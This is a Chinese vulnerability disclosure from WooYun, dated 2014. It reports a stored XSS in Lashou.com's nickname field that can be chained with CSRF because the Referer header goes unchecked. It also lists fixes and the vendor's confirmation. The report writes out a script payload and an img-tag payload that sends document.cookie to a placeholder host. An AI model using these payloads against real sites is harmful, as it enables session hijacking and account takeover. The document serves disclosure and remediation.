漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-054096
漏洞标题:拉手网 csrf+xss组合利用
相关厂商:拉手网
漏洞作者: x44s
提交时间:2014-03-20 15:28
修复时间:2014-05-04 15:29
公开时间:2014-05-04 15:29
漏洞类型:xss跨站脚本攻击
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-03-20: 细节已通知厂商并且等待厂商处理中
2014-03-25: 厂商已经确认,细节仅向厂商公开
2014-04-04: 细节向核心白帽子及相关领域专家公开
2014-04-14: 细节向普通白帽子公开
2014-04-24: 细节向实习白帽子公开
2014-05-04: 细节向公众公开
简要描述:
在账户设置修改昵称处存在存储型xss
详细说明:
修改昵称处插入xss "><script>alert(1)</script> 于是乎想去评论那看看,但是得花钱买了东西才能评论啊,果断花了一块钱
我勒个去买了东西都还不能评论 太坑爹了
想想怎么利用。。。。
正常提交修改抓包看一下。
我把referer去掉提交,居然修改成功了,那这不是可以csrf了么
接着构造一个修改昵称的表单,在昵称value中插入"><img src="http://xx.xx.xx/?xx="+document.cookie>,结果标签有长度限制,好吧 利用牛人们方法的把存储型xss转换为反射型xss。
漏洞证明:
修复方案:
过滤
验证referer
加个验证码
版权声明:转载请注明来源 x44s@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2014-03-25 19:22
厂商回复:
感谢,已经告知开发人员
最新状态:
暂无